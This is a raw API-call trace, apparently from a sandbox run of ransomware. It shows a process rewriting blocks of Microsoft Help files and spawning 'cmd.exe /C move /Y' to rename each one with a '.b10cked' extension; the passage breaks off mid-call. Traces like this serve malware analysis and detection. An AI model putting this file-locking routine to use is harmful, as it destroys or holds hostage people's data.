SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x146 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.827] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0197.829] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.829] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0197.829] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0197.829] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0197.829] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0197.829] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0197.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSOUC.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0197.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSOUC.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1328794, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSOUC.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0197.833] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x146 [0197.833] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.833] CloseHandle (hObject=0x120) returned 1 [0197.834] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN") returned 0x27 [0197.834] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.834] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSOUC.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSOUC.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xc2c, dwThreadId=0xcb4)) returned 1 [0197.883] CloseHandle (hObject=0x1b4) returned 1 [0197.883] CloseHandle (hObject=0x120) returned 1 [0197.883] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.883] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.883] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.883] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.883] ReleaseMutex (hMutex=0xf8) returned 1 [0197.883] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.883] ReleaseMutex (hMutex=0xf8) returned 1 [0197.883] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.883] ReleaseMutex (hMutex=0xf8) returned 1 [0197.883] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.883] ReleaseMutex (hMutex=0xf8) returned 1 [0197.883] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.916] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25470544820) returned 1 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x146 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.918] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.918] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x146 [0197.918] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.918] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.918] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.918] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x146 [0197.918] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.918] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.918] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0197.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.919] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0197.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0197.919] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0197.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0197.919] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0197.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSPUB.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0197.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSPUB.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1328794, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSPUB.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0197.923] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x146 [0197.923] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.923] CloseHandle (hObject=0x120) returned 1 [0197.924] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN") returned 0x27 [0197.925] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.925] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xcc8, dwThreadId=0xd24)) returned 1 [0198.037] CloseHandle (hObject=0x1b4) returned 1 [0198.037] CloseHandle (hObject=0x120) returned 1 [0198.037] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.037] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.037] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.037] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.038] ReleaseMutex (hMutex=0xf8) returned 1 [0198.038] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.038] ReleaseMutex (hMutex=0xf8) returned 1 [0198.038] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.038] ReleaseMutex (hMutex=0xf8) returned 1 [0198.038] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.038] ReleaseMutex (hMutex=0xf8) returned 1 [0198.038] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.038] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.038] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.038] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25482773786) returned 1 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x15e [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.041] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x15e [0198.041] SetFilePointer (in: 